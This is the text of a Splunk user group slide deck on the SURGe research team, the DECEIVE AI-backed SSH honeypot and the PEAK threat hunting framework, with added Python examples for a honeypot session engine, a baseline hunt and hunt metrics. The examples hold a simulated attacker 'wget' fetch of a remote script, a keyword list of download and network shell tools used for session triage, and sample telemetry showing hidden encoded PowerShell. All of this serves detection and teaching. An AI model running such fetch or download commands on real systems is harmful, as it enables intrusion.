© 2023 SPLUNK INC.
Prague Splunk User Group #7
3 June 2025
With David Bianco on Splunk SURGe
Hosts: Tomáš Moser, Ingrid Němečková, Michał Skorczewski, Radek Filip
Agenda
16:30 - 17:00 (30 min) Registration
17:00 - 17:10 (10 min) Intro
17:10 - 17:40 (30 min) Part 1: SURGe Team
17:40 - 18:10 (30 min) Part 2: DECEIVE Project
18:10 - 18:20 (10 min) Coffee Break
18:20 - 18:50 (30 min) Part 3: PEAK Threat Hunting Framework
18:50 - 19:00 (10 min) Wrap-Up and Q&A
Splunk User Group Community
From Splunkers To Splunkers
✓ No sales
✓ No marketing
✓ It’s about YOU!
✓ Ask!
Who Are We?
Tomáš Moser, Sr. Solutions Engineer - GSS, Splunk, tommoser@cisco.com
Ingrid Nemečková, Technical Support Engineer, Splunk, inemecko@cisco.com
Radek Filip, Splunk Consultant, ALEF NULA, radek.filip@alef.com
Michał Skórczewski, Sr. Solutions Engineer, Splunk, mskorcze@cisco.com
David J. Bianco
Staff Security Strategist, Splunk SURGe
Passionate about improving security for everyone
SANS certified instructor | Creator of Pyramid of Pain and Hunting Maturity Model | Lead author of PEAK threat hunting framework | …
@DavidJBianco.bsky.social (Bluesky)
@DavidJBianco@infosec.exchange (Mastodon)
© 2025 SPLUNK LLC
Part 1: SURGe Team
Splunk Users' Group Meeting
David J. Bianco
Staff Security Strategist
SURGe by Splunk
dabianco@cisco.com
@DavidJBianco.bsky.social
@DavidJBianco@infosec.exchange
Forward-looking statements
This presentation may contain forward-looking statements that are subject to the safe harbors created under the Securities Act
of 1933, as amended, and the Securities Exchange Act of 1934, as amended. All statements other than statements of historical
facts are statements that could be deemed forward-looking statements. These statements are based on current expectations,
estimates, forecasts, and projections about the industries in which we operate and the beliefs and assumptions of our
management based on the information currently available to us. Words such as “expects,” “anticipates,” “targets,” “goals,”
“projects,” “intends,” “plans,” “believes,” “momentum,” “seeks,” “estimates,” “continues,” “endeavors,” “strives,” “may,” variations
of such words, and similar expressions are intended to identify such forward-looking statements. In addition, any statements that
refer to (1) our goals, commitments, and programs; (2) our business plans, initiatives, and objectives; and (3) our assumptions and
expectations, including our expectations regarding our financial performance, products, technology, strategy, customers,
markets, acquisitions and investments are forward-looking statements. These forward-looking statements are not guarantees of
future performance and involve significant risks, uncertainties and other factors that may cause our actual results, performance
or achievements to be materially different from results, performance or achievements expressed or implied by the
forward-looking statements contained in this presentation. Readers are cautioned that these forward-looking statements are
only predictions and are subject to risks, uncertainties, and assumptions that are difficult to predict, including those identified in
the “Risk Factors” section of Cisco’s most recent report on Form 10-Q filed on February 20, 2024 and its most recent report on
Form 10-K filed on September 7, 2023, as well as the “Risk Factors” section of Splunk’s most recent report on Form 10-Q filed with
the SEC on November 28, 2023. The forward-looking statements made in this presentation are made as of the time and date of
this presentation. If reviewed after the initial presentation, even if made available by Cisco or Splunk, on Cisco or Splunk’s
website or otherwise, it may not contain current or accurate information. Cisco and Splunk undertake no obligation to revise or
update any forward-looking statements for any reason, except as required by law.
In addition, any information about new products, features, functionality or our roadmap outlines our general product direction
and is subject to change at any time without notice. It is for informational purposes only and shall not be incorporated into any
contract or other commitment or be relied upon in making a purchasing decision. We undertake no commitment, promise or
obligation either to develop the features or functionalities described, in beta or in preview (used interchangeably), or to include
any such feature or functionality in a future release. The development, release, and timing of any features or functionality
described for our products remains at our sole discretion.
Splunk, Splunk> and Turn Data Into Doing are trademarks and registered trademarks of Splunk LLC in the United States and
other countries. All other brand names, product names or trademarks belong to their respective owners.
© 2025 Splunk LLC. All rights reserved.
About SURGe
SURGe is a global team of security experts dedicated to enhancing cybersecurity through relevant strategic cybersecurity research and by providing valuable insights into the current state and evolution of cybersecurity threats.
Take advantage of SURGe expertise and knowledge sharing to elevate your security operations and navigate high-profile events with confidence.
Expertise to help solve security problems
● Security Research: Practical solutions to help understand, anticipate and respond to threats
● Cybersecurity Insights: Proactively fortify your defenses and stay ahead of threats
● Security Outreach: Enable security teams with hands-on content that enhances capabilities
Meet the team
David Bianco, Staff Security Strategist, SURGe
● 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics
● SANS Certified Instructor
● Creator of the Pyramid of Pain & Hunting Maturity Model
● Lead author of PEAK
● Terrible at introducing himself
Published Research
Ransomware Analysis
Analyzing encryption speeds to reconsider ransomware response.
Macro-ATT&CK Series
Analyzing ATT&CK-mapped threat reporting to drive planning decisions in the SOC.
Evaluating CA Trustworthiness
Internet security is built on TLS, which anchors its trust on Root CAs. How do we know they are all worthy of our trust?
AI vs. Human-crafted Spear Phishing: Old School vs. New School
Will chat-based AI assistants provide more utility to attackers, or to defenders?
Chrome Browser Extension Analysis
Examining extensions you might use regularly, highlighting potential risks and best practices.
Threat Hunting Essential Tasks and Resources
What are the essential tasks and resources for threat hunters?
The Intersection of Security and Observability
Understanding observability tools to help blue teams.
LLM Lifeguard: Safeguarding LLMs with Splunk and OWASP Top 10
A focused approach to securing Large Language Models.
Vulnerability Prioritization
A case study of recent large-scale security incidents to help inform vulnerability management strategy.
Gen-AI for the Blue Team
Practical guidance about how to match security needs with LLM strengths when evaluating potential AI solutions for cybersecurity defense.
DECEIVE
A high-interaction, low-effort honeypot system that uses AI to simulate a realistic system, complete with data, that an attacker can interact with.
Autonomous Adversaries: Are Blue Teams ready for Cyberattacks to go Agentic?
Evaluating attacker technique use against the measured ability of language models to accurately reproduce those techniques, in the context of modern "agentic" automation.
Defending at Machine-Speed: Accelerated Threat Hunting with Open Weight LLM Models
Integrating an open-weight language model for threat hunting PowerShell scripts cut initial event classification time by more than 99%, a 250x speed increase.
AI for Vulnerability Investigation and Prioritisation
So many vulnerabilities, so little time! How does one understand and respond to all these new CVEs?
Current Projects
Post-logon Behavioural Fingerprinting and Detection
Creating user behavior fingerprints in order to detect malicious logons as quickly as possible.
PEAK Threat Hunter's Cookbook
A structured approach to closing the gap between theory and practice in threat hunting. Teaching analysts to cook, with Splunk!
Cybersecurity Insights
The PEAK Threat Hunting Framework
PEAK builds on existing frameworks (Sqrrl, TaHiTi) and helps you quickly establish repeatable, efficient hunting operations:
● Hypothesis-driven, Baseline, and Machine Learning/AI hunt procedures
● Standards for hunt documentation
● Guidelines for creating automated detection
● Metrics that highlight the impact of hunting
For more on PEAK, download the official framework documentation at splk.it/PEAK-Framework
Bluenomicon: The Network Defender’s Compendium
Personal essays from cybersecurity luminaries. Download your copy at splk.it/bluenomicon
Part 2: DECEIVE Project
Hi Fidelity != Hi Effort
Meet DECEIVE, the AI-backed SSH Honeypot
David J. Bianco
Staff Security Strategist
@DavidJBianco@infosec.exchange
@DavidJBianco.bsky.social
June 2025
© 2025 Cisco and/or its affiliates. All rights reserved.
Cisco Confidential
About Me
• 20+ years of experience in incident detection & response, threat hunting, CTI, and other Blue-team topics
• SANS Certified Instructor
• Creator of the Pyramid of Pain & Lead author of the PEAK Threat Hunting Framework
• Terrible at introducing himself
Why I started writing DECEIVE
The problem I wanted to solve
Deception is a balancing act between realism and effort. The more realistic it is, the more time you must put into it to set it up.
Plus, real systems are vulnerable to exploitation and misuse, which can be a barrier to adoption (just ask your lawyers).
How does DECEIVE address the problems?
DECEIVE leverages a modular AI backend to provide all the "realism": users, processes, and data.
Given a short, simple prompt, it can simulate a variety of different SSH-accessible systems. It looks real, but there's no actual system for threat actors to take advantage of.
Example prompts:
● You are a video game developer's system. Include realistic video game source and asset files.
● You are a Cisco router running IOS XE 17.17.
● You are a SunOS 4.1 workstation.
DECEIVE Demo!
Sample log: User input
pwd
/home/guest
guest@prod-dev01:~ $
Sample log: Session Evaluation
DECEIVE Development
Me: a Python programmer with just a bit of prior LLM coding experience.
From idea to first working demo: three days.
• Half of that was getting the SSH code to work right.
With additional enhancements courtesy of GitHub Copilot.
Weaknesses and Drawbacks
• Every session is a new system.
• No terminal interaction. Certain commands (e.g., vi) don’t work.
• You cannot move data in or out of the honeypot. Payloads can’t be downloaded.
• Timing depends on the LLM response time, which can be slow.
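What the design in "How does DECEIVE address the problems?" and the "Sample log" slides imply in code, as an added example written for this page (it is not code from the DECEIVE repository): a session engine in which the persona prompt, the running transcript and a pluggable model backend are the only state, plus a session evaluation when the connection closes. The `Backend` and `Judge` signatures, the `fake_linux_host` stand-in (a tiny in-memory filesystem so the example runs offline) and the keyword-based `heuristic_judge` are assumptions of this example; in DECEIVE both roles are played by the language model, and the SSH transport is left out entirely.

```python
"""Minimal LLM-backed shell honeypot session engine (added example, not DECEIVE's code)."""
import json
import posixpath
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List

Turn = Dict[str, str]                        # {"role": "user" | "assistant", "content": ...}
Backend = Callable[[str, List[Turn]], str]   # (persona prompt, transcript so far) -> output text
Judge = Callable[[List[Turn]], str]          # transcript -> "BENIGN" | "SUSPICIOUS" | "MALICIOUS"


@dataclass
class Session:
    """One attacker connection. The persona is fixed at connect time and each command
    is appended to the transcript before the backend is called, so the simulated host
    stays self-consistent within the session. A new connection starts with an empty
    transcript, which is why every session is a new system."""
    persona: str
    backend: Backend
    judge: Judge
    prompt: str = "guest@prod-dev01:~ $ "
    transcript: List[Turn] = field(default_factory=list)
    records: List[dict] = field(default_factory=list)

    def run(self, command: str) -> str:
        self.transcript.append({"role": "user", "content": command})
        output = self.backend(self.persona, self.transcript)
        self.transcript.append({"role": "assistant", "content": output})
        # The only artefact of a command is text: nothing executes, no file is written
        # and no socket opens on the attacker's behalf, so payloads have nowhere to land.
        self.records.append({"ts": time.time(), "input": command, "output": output})
        return output

    def close(self) -> dict:
        """Session evaluation: the judge sees the whole transcript once, at the end."""
        return {"persona": self.persona, "commands": len(self.records),
                "verdict": self.judge(self.transcript), "log": self.records}


# ---- constructed stand-ins so the example runs offline (assumptions, not DECEIVE) ----
# A real backend is a language model acting out the persona; this fake knows a few
# commands over a tiny filesystem and, like the model, keeps no state of its own:
# the working directory is recovered by replaying the transcript.
_DIRS = {"/": ["etc", "home"], "/etc": ["hostname", "passwd"],
         "/home": ["guest"], "/home/guest": ["notes.txt"]}
_FILES = {"/etc/hostname": "prod-dev01\n",
          "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                         "guest:x:1000:1000::/home/guest:/bin/bash\n",
          "/home/guest/notes.txt": "TODO: rotate the deploy key before Friday\n"}


def _resolve(cwd: str, target: str) -> str:
    if target == "~" or target.startswith("~/"):
        target = "/home/guest" + target[1:]
    return posixpath.normpath(posixpath.join(cwd, target))


def _cwd_from(transcript: List[Turn]) -> str:
    cwd = "/home/guest"
    for turn in transcript[:-1]:            # every turn before the current command
        parts = turn["content"].split()
        if turn["role"] == "user" and parts[:1] == ["cd"]:
            new = _resolve(cwd, parts[1]) if len(parts) > 1 else "/home/guest"
            if new in _DIRS:
                cwd = new
    return cwd


def fake_linux_host(persona: str, transcript: List[Turn]) -> str:
    cwd = _cwd_from(transcript)
    parts = transcript[-1]["content"].split()
    if not parts:
        return ""
    cmd, args = parts[0], parts[1:]
    if cmd == "pwd":
        return cwd + "\n"
    if cmd == "whoami":
        return "guest\n"
    if cmd == "hostname":
        return _FILES["/etc/hostname"]
    if cmd == "cd":
        target = _resolve(cwd, args[0]) if args else "/home/guest"
        return "" if target in _DIRS else f"bash: cd: {args[0]}: No such file or directory\n"
    if cmd == "ls":
        target = _resolve(cwd, args[0]) if args else cwd
        if target in _DIRS:
            return "  ".join(_DIRS[target]) + "\n"
        return f"ls: cannot access '{args[0]}': No such file or directory\n"
    if cmd == "cat":
        return "".join(_FILES.get(_resolve(cwd, a), f"cat: {a}: No such file or directory\n")
                       for a in args)
    return f"bash: {cmd}: command not found\n"


_DOWNLOAD = {"wget", "curl", "tftp", "scp", "nc", "chmod"}
_RECON = {"whoami", "id", "uname", "cat", "ps", "netstat", "ss", "ifconfig", "ip"}


def heuristic_judge(transcript: List[Turn]) -> str:
    """Stand-in for the model-written evaluation: keyword triage of the commands typed."""
    cmds = [t["content"].split()[0] for t in transcript
            if t["role"] == "user" and t["content"].split()]
    if any(c in _DOWNLOAD for c in cmds):
        return "MALICIOUS"
    if sum(c in _RECON for c in cmds) >= 2:
        return "SUSPICIOUS"
    return "BENIGN"


if __name__ == "__main__":
    s = Session("You are a SunOS 4.1 workstation.", fake_linux_host, heuristic_judge)
    for line in ["pwd", "cd /etc", "cat hostname passwd", "wget http://198.51.100.7/x.sh"]:
        print(s.prompt + line)
        print(s.run(line), end="")
    print(json.dumps(s.close(), indent=1))
```

Two of the drawbacks listed above fall directly out of this structure: a fresh `Session` has an empty transcript, so every connection is a new system, and `run()` only moves text, so a download attempt can only ever be narrated by the backend, never executed. Note that with a real model the `wget` line would be answered with a plausible transfer log rather than "command not found"; the verdict logic is where the transcript gets turned into something a SOC can act on.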
Future Plans
• Can I make it more realistic?
• Can I improve emulation of non-Linuxy things?
• Automated honeynet deployment?
• What about other protocols?
How to get started with DECEIVE
Source code is available on GitHub: https://github.com/splunk/DECEIVE
Part 3: PEAK Framework
The PEAK Threat Hunting Framework
The Sqrrl Threat Hunting Loop (2015)
Everyone wanted to hunt, but few agreed on what hunting was or how to do it. Sqrrl’s threat hunting loop was the first published “how to” for threat hunting, focused on hypothesis-driven hunting and detection improvement.
Credit: Sqrrl
Prepare, Execute, and Act with Knowledge
PEAK incorporates lessons and experience from the last ten years:
More hunt types
● Hypothesis-driven
● Baseline (anomaly)
● Model-Assisted Threat Hunting (MATH)
● With detailed processes
Defined deliverables
● Hunt documentation
● Gaps & risks
● Stakeholder comms
● Detections
Detection guidance
● Not only incidents
● Hierarchy of detection outputs provides additional options
● Helps teams target specific detections for improvement
● Beyond just rules
Effective metrics
● Communicate the impact of hunting
● Show value across your entire security program
● Better storytelling
Complete process diagrams for new hunt types: Hypothesis-Based, Baseline, Model-Assisted
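The baseline (anomaly) hunt type, carried through as an added example for this page rather than PEAK's own tooling, and in Python instead of SPL so it runs offline: establish what "normal" looks like from a baseline window of process-creation events, then score the hunt window against it by prevalence, the number of distinct hosts a parent/child pair was seen on. The event shape, host names, `HUNT_START` cut-over and the `max_hosts` rarity threshold are constructed for the example.

```python
"""Baseline (anomaly) hunt over process-creation telemetry (added example)."""
import json
import ntpath
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Set, Tuple

Pair = Tuple[str, str]  # (parent image, child image) after normalisation

# Constructed events in the shape of a Sysmon event ID 1 / EDR export:
# a baseline month of ordinary activity, then the hunt day (2 June).
SAMPLE_LOG = r"""
{"ts":"2025-05-05T09:12:00","host":"ws-01","parent":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","cmdline":"chrome.exe"}
{"ts":"2025-05-06T10:01:00","host":"ws-02","parent":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","cmdline":"chrome.exe"}
{"ts":"2025-05-07T08:40:00","host":"ws-03","parent":"C:\\Windows\\Explorer.EXE","image":"chrome.exe","cmdline":"chrome.exe --profile-directory=Default"}
{"ts":"2025-05-08T11:30:00","host":"ws-01","parent":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","cmdline":"WINWORD.EXE /n report.docx"}
{"ts":"2025-05-12T14:05:00","host":"ws-02","parent":"OUTLOOK.EXE","image":"WINWORD.EXE","cmdline":"WINWORD.EXE /n invoice.docx"}
{"ts":"2025-05-15T07:55:00","host":"jump-01","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\whoami.exe","cmdline":"whoami /groups"}
{"ts":"2025-06-02T09:02:00","host":"ws-01","parent":"C:\\Windows\\explorer.exe","image":"chrome.exe","cmdline":"chrome.exe"}
{"ts":"2025-06-02T09:15:00","host":"ws-02","parent":"OUTLOOK.EXE","image":"WINWORD.EXE","cmdline":"WINWORD.EXE /n quote.docx"}
{"ts":"2025-06-02T09:16:30","host":"ws-07","parent":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"ts":"2025-06-02T09:17:10","host":"ws-07","parent":"cmd.exe","image":"whoami.exe","cmdline":"whoami /all"}
"""
HUNT_START = datetime(2025, 6, 2)   # events before this form the baseline window


def _norm(image: str) -> str:
    """Key on the lower-cased basename so path and case variants collapse into one pair."""
    return ntpath.basename(image).lower()


def parse_events(lines: Iterable[str]) -> List[dict]:
    events = []
    for line in lines:
        if not line.strip():
            continue
        e = json.loads(line)
        e["ts"] = datetime.fromisoformat(e["ts"])
        e["pair"] = (_norm(e["parent"]), _norm(e["image"]))
        events.append(e)
    return events


def build_baseline(events: List[dict], hunt_start: datetime) -> Dict[Pair, Set[str]]:
    """Prevalence of each parent/child pair: the set of hosts it ran on before the hunt window."""
    prevalence: Dict[Pair, Set[str]] = defaultdict(set)
    for e in events:
        if e["ts"] < hunt_start:
            prevalence[e["pair"]].add(e["host"])
    return prevalence


def baseline_hunt(events: List[dict], hunt_start: datetime, max_hosts: int = 1) -> List[dict]:
    """Report hunt-window pairs that were unseen (0 hosts) or rare (<= max_hosts)
    in the baseline, least prevalent first."""
    baseline = build_baseline(events, hunt_start)
    findings: Dict[Pair, dict] = {}
    for e in events:
        if e["ts"] < hunt_start:
            continue
        known_on = baseline.get(e["pair"], set())
        if len(known_on) > max_hosts:
            continue                      # normal: seen widely in the baseline
        f = findings.setdefault(e["pair"], {
            "parent": e["pair"][0], "image": e["pair"][1],
            "baseline_hosts": len(known_on), "hunt_hosts": set(),
            "example_cmdline": e["cmdline"]})
        f["hunt_hosts"].add(e["host"])
    ordered = sorted(findings.values(),
                     key=lambda f: (f["baseline_hosts"], -len(f["hunt_hosts"])))
    for f in ordered:
        f["hunt_hosts"] = sorted(f["hunt_hosts"])
    return ordered


def run_sample() -> List[dict]:
    return baseline_hunt(parse_events(SAMPLE_LOG.splitlines()), HUNT_START)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['parent']} -> {f['image']}: baseline hosts={f['baseline_hosts']}, "
              f"hunt hosts={f['hunt_hosts']}, e.g. {f['example_cmdline']}")
```

Pairs that are new on many hosts at once usually mean a software rollout; the PEAK output for those is a baseline update, not an incident, which is why the ordering keeps the host count visible. The zero-prevalence pair here (Word spawning encoded PowerShell) is the kind of finding that becomes a signature, while the rare-but-known pair is a candidate for an analytic that weights by prevalence rather than a hard rule.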
Defined Hunt Deliverables
Detection Engineering Guidance
PEAK's hierarchy of detection outputs, from most to least automated:
1. Signatures & Rules: Splunk® Enterprise Security, Suricata IDS, etc. Automated. Simple and easy to manage.
2. Analytics in Code: Splunk® MLTK, Python, or other algorithmic detections. Automated, but more complex. May take significant resources. More management and upkeep necessary.
3. Dashboards & Visualizations: Present the distilled info to humans and let them decide. Some automation, but still requires manual review on a regular basis.
4. Reports: Saved searches with little or no pre-processing. Human must spend significant effort to extract meaning.
Metrics to tell the story of hunting impact
1. Incidents Opened: Number of incidents created during hunts, but also opened later as a result of detections created from hunting.
2. Detections Created/Updated: Number of new or improved detections, by type, as a result of hunting.
3. Gaps Identified / Gaps Closed: Visibility, tools, access, etc. that you didn’t have, and ones that you later acquired.
4. Vulnerabilities & Misconfigurations: Updates and corrections to systems and services as a result of hunt findings.
5. Techniques Hunted: Map hunted behaviors to ATT&CK, Kill Chain, Pyramid of Pain, etc. Where are you hunting? Where should you hunt next?
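The five metrics above computed from hunt records, as an added example that is not part of PEAK: the record schema (`techniques`, `detections` each carrying an `incidents_since` list, `gaps`, `fixes`, `incidents_during`), the three sample hunts and the `PRIORITY_TECHNIQUES` list are constructed for it. The point of the schema is that each deliverable a hunt produces is recorded in a form the metrics can be derived from later, rather than reconstructed from memory at reporting time.

```python
"""Hunt-impact metrics derived from per-hunt deliverable records (added example)."""
from collections import Counter
from typing import Dict, List

# Constructed hunt records: one per completed hunt, fields mirroring the PEAK
# deliverables. `incidents_since` on a detection is what lets incidents opened
# *after* the hunt, by a hunt-born detection, still be credited to hunting.
HUNTS: List[dict] = [
    {"id": "H-2025-04", "techniques": ["T1059.001", "T1566.001"],
     "detections": [{"name": "Office app spawns PowerShell", "type": "rule",
                     "incidents_since": ["INC-1042", "INC-1077"]}],
     "gaps": [{"desc": "No PowerShell script block logging on laptops", "closed": True}],
     "fixes": 0, "incidents_during": []},
    {"id": "H-2025-05", "techniques": ["T1021.001"],
     "detections": [{"name": "RDP lateral movement scoring", "type": "analytic",
                     "incidents_since": []},
                    {"name": "RDP source/destination matrix", "type": "dashboard",
                     "incidents_since": []}],
     "gaps": [{"desc": "No auth logs from the OT jump hosts", "closed": False}],
     "fixes": 3, "incidents_during": ["INC-1050"]},
    {"id": "H-2025-06", "techniques": ["T1059.001", "T1053.005"],
     "detections": [], "gaps": [], "fixes": 1, "incidents_during": []},
]

# Techniques the organisation's threat profile ranks highest (constructed list).
PRIORITY_TECHNIQUES = ["T1059.001", "T1566.001", "T1021.001", "T1003.001", "T1486"]


def hunt_metrics(hunts: List[dict], priority: List[str]) -> Dict[str, object]:
    """Roll the five PEAK metrics up from the hunt records."""
    per_technique = Counter(t for h in hunts for t in h["techniques"])
    hunted = sorted(per_technique)
    detections_by_type = Counter(d["type"] for h in hunts for d in h["detections"])
    incidents = set()                     # a set, so one incident credited twice counts once
    for h in hunts:
        incidents.update(h["incidents_during"])
        for d in h["detections"]:
            incidents.update(d["incidents_since"])
    gaps = [g for h in hunts for g in h["gaps"]]
    return {
        "incidents_opened": len(incidents),
        "detections_created": dict(detections_by_type),
        "gaps_identified": len(gaps),
        "gaps_closed": sum(1 for g in gaps if g["closed"]),
        "fixes_applied": sum(h["fixes"] for h in hunts),
        "techniques_hunted": hunted,
        "hunts_per_technique": dict(per_technique),      # where are you hunting?
        "hunt_next": [t for t in priority if t not in per_technique],  # where next?
    }


if __name__ == "__main__":
    for key, value in hunt_metrics(HUNTS, PRIORITY_TECHNIQUES).items():
        print(f"{key}: {value}")
```

`hunt_next` answers the slide's "where should you hunt next?" mechanically: priority techniques from the threat profile that no hunt has covered yet. Without the `incidents_since` link on each detection, the incidents metric would count only INC-1050 and understate the programme's impact by two-thirds in this sample.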
Reach the PEAK!
Download the PEAK eBook. Join the Community Slack: #peak-threat-hunting
PEAK Threat Hunter's Cookbook
A structured approach to closing the gap between theory and practice in threat hunting. Teaching analysts to cook, with Splunk!
COMING AUGUST 2025
The PEAK Threat Hunting Workshop
● Understand the PEAK Framework
● Master Three Types of Threat Hunts
● Hands-on Experience
Where you can find us
How to stay informed
● Stay up to date on all things SURGe with our Newsletter: splunk.com/surge
Thank you
Wrap-Up
● Did you like it?
● Please fill in the post-event survey!
● Slides will be shared on SUG #7 event page and Slideshare!
● Talk to us :-)
Slack: Register and subscribe to #ug_prague channel
Email: tommoser@cisco.com, inemecko@cisco.com, mskorcze@cisco.com, radek.filip@alef.com
LinkedIn: https://www.linkedin.com/groups/9544692/
See you next time

More Related Content

PDF
Splunk Leadership Forum Wien - 20.05.2025
PDF
Power the SOC of the Future with scale, speed and choice - Splunk Public Sect...
PDF
SFBA Splunk Usergroup meeting Nov 20, 2024
PDF
Splunk ES 8 mission controle data analytic
PDF
March 2023 PNW User Group
PDF
2022 09 March Splunk PNW User Group
PDF
Splunk Solution overview testing versi 1
PPTX
Splunk enterprise security_splunk_bengaluru_user_group_2020_10_03
Splunk Leadership Forum Wien - 20.05.2025
Power the SOC of the Future with scale, speed and choice - Splunk Public Sect...
SFBA Splunk Usergroup meeting Nov 20, 2024
Splunk ES 8 mission controle data analytic
March 2023 PNW User Group
2022 09 March Splunk PNW User Group
Splunk Solution overview testing versi 1
Splunk enterprise security_splunk_bengaluru_user_group_2020_10_03

Similar to PSUG 7 - 2025-06-03 - David Bianco on Splunk SURGe (20)

PDF
SplunkLive! Wien - Splunk für Security
PDF
SplunkLive! Zürich - Splunk für Security
PDF
Webinar: Neues zur Splunk App for Enterprise Security
PPTX
Build a Security Portfolio That Strengthens Your Security Posture
PDF
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
PDF
Mission possible splunk+paloaltonetworks_6_2015
PDF
SplunkLive! München 2016 - Splunk für Security
PPTX
Make Your SOC Work Smarter, Not Harder
PPTX
Security crawl walk run presentation mckay v1 2017
PPTX
SplunkLive! London 2017 - Build a Security Portfolio That Strengthens Your Se...
PDF
Splunk bangalore user group 2020-06-01
PDF
Building an Analytics Enables SOC
PPTX
Splunk live nyc_2017_sec_buildinganalyticsdrivensoc
PDF
Splunk Discovery: Warsaw 2018 - Solve Your Security Challenges with Splunk En...
PPTX
Splunk EMEA Webinar: Scoping infections and disrupting breaches
PDF
Intro To Observability-March-2023.pdf
PPTX
Splunk for Security Breakout Session
PDF
Using Machine Learning and Analytics to Hunt for Security Threats - Webinar
PPTX
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
PPTX
Splunk Overview
SplunkLive! Wien - Splunk für Security
SplunkLive! Zürich - Splunk für Security
Webinar: Neues zur Splunk App for Enterprise Security
Build a Security Portfolio That Strengthens Your Security Posture
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Mission possible splunk+paloaltonetworks_6_2015
SplunkLive! München 2016 - Splunk für Security
Make Your SOC Work Smarter, Not Harder
Security crawl walk run presentation mckay v1 2017
SplunkLive! London 2017 - Build a Security Portfolio That Strengthens Your Se...
Splunk bangalore user group 2020-06-01
Building an Analytics Enables SOC
Splunk live nyc_2017_sec_buildinganalyticsdrivensoc
Splunk Discovery: Warsaw 2018 - Solve Your Security Challenges with Splunk En...
Splunk EMEA Webinar: Scoping infections and disrupting breaches
Intro To Observability-March-2023.pdf
Splunk for Security Breakout Session
Using Machine Learning and Analytics to Hunt for Security Threats - Webinar
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk Overview
Ad

More from Tomas Moser (6)

PDF
PSUG 6 - 2025-04-14 - Splunk Data Normalization, Detection Engineering, EdgeHub
PDF
PSUG 5 - 2025-01-20 - Splunk Observability And Digital Resilience
PDF
PSUG 4 - 2024-10-21 - Splunk & Škoda Auto
PDF
PSUG 3 - 2024-07-15 - Splunk & AI with Philipp Drieger
PDF
PSUG 2 - 2024-04-15: Proactive IT Monitoring & Dynamic Asset Management (Czech)
PDF
PSUG 1 - 2024-01-22 - Onboarding Best Practices
PSUG 6 - 2025-04-14 - Splunk Data Normalization, Detection Engineering, EdgeHub
PSUG 5 - 2025-01-20 - Splunk Observability And Digital Resilience
PSUG 4 - 2024-10-21 - Splunk & Škoda Auto
PSUG 3 - 2024-07-15 - Splunk & AI with Philipp Drieger
PSUG 2 - 2024-04-15: Proactive IT Monitoring & Dynamic Asset Management (Czech)
PSUG 1 - 2024-01-22 - Onboarding Best Practices
Ad

Recently uploaded (20)

PDF
Data Engineering Interview Questions & Answers Cloud Data Stacks (AWS, Azure,...
PPTX
STERILIZATION AND DISINFECTION-1.ppthhhbx
PPTX
Qualitative Qantitative and Mixed Methods.pptx
PDF
How to run a consulting project- client discovery
PDF
REAL ILLUMINATI AGENT IN KAMPALA UGANDA CALL ON+256765750853/0705037305
PPTX
A Complete Guide to Streamlining Business Processes
PDF
Microsoft Core Cloud Services powerpoint
PPTX
Acceptance and paychological effects of mandatory extra coach I classes.pptx
PPTX
(Ali Hamza) Roll No: (F24-BSCS-1103).pptx
PDF
Business Analytics and business intelligence.pdf
PPTX
Managing Community Partner Relationships
PPTX
CEE 2 REPORT G7.pptxbdbshjdgsgjgsjfiuhsd
PPTX
Modelling in Business Intelligence , information system
PPTX
Topic 5 Presentation 5 Lesson 5 Corporate Fin
PDF
Introduction to the R Programming Language
PDF
annual-report-2024-2025 original latest.
PDF
Lecture1 pattern recognition............
PDF
Transcultural that can help you someday.
PDF
Introduction to Data Science and Data Analysis
PPTX
Microsoft-Fabric-Unifying-Analytics-for-the-Modern-Enterprise Solution.pptx
Data Engineering Interview Questions & Answers Cloud Data Stacks (AWS, Azure,...
STERILIZATION AND DISINFECTION-1.ppthhhbx
Qualitative Qantitative and Mixed Methods.pptx
How to run a consulting project- client discovery
REAL ILLUMINATI AGENT IN KAMPALA UGANDA CALL ON+256765750853/0705037305
A Complete Guide to Streamlining Business Processes
Microsoft Core Cloud Services powerpoint
Acceptance and paychological effects of mandatory extra coach I classes.pptx
(Ali Hamza) Roll No: (F24-BSCS-1103).pptx
Business Analytics and business intelligence.pdf
Managing Community Partner Relationships
CEE 2 REPORT G7.pptxbdbshjdgsgjgsjfiuhsd
Modelling in Business Intelligence , information system
Topic 5 Presentation 5 Lesson 5 Corporate Fin
Introduction to the R Programming Language
annual-report-2024-2025 original latest.
Lecture1 pattern recognition............
Transcultural that can help you someday.
Introduction to Data Science and Data Analysis
Microsoft-Fabric-Unifying-Analytics-for-the-Modern-Enterprise Solution.pptx

PSUG 7 - 2025-06-03 - David Bianco on Splunk SURGe

  • 1. © 2023 SPLUNK INC. Prague Splunk User Group #7 3/6/2025 With David Bianco on Splunk SURGe Tomáš Moser Ingrid Němečková Michał Skorczewski Radek Filip
  • 2. © 2023 SPLUNK INC. 16:30 - 17:00 (30 min) Registration 17:00 - 17:10 (10 min) Intro 17:10 - 17:40 (30 min) Part 1: SURGe Team 17:40 - 18:10 (30 min) Part 2: DECEIVE Project 18:10- 18:20 (10 min) Coffee Break 18:20 - 18:50 (30 min) Part 3: PEAK Threat Hunting Framework 18:50 - 19:00 (30 min) Wrap-Up and Q&A Agenda
  • 3. © 2023 SPLUNK INC. Splunk User Group Community From Splunkers To Splunkers ✓ No sales ✓ No marketing ✓ It’s about YOU! ✓ Ask!
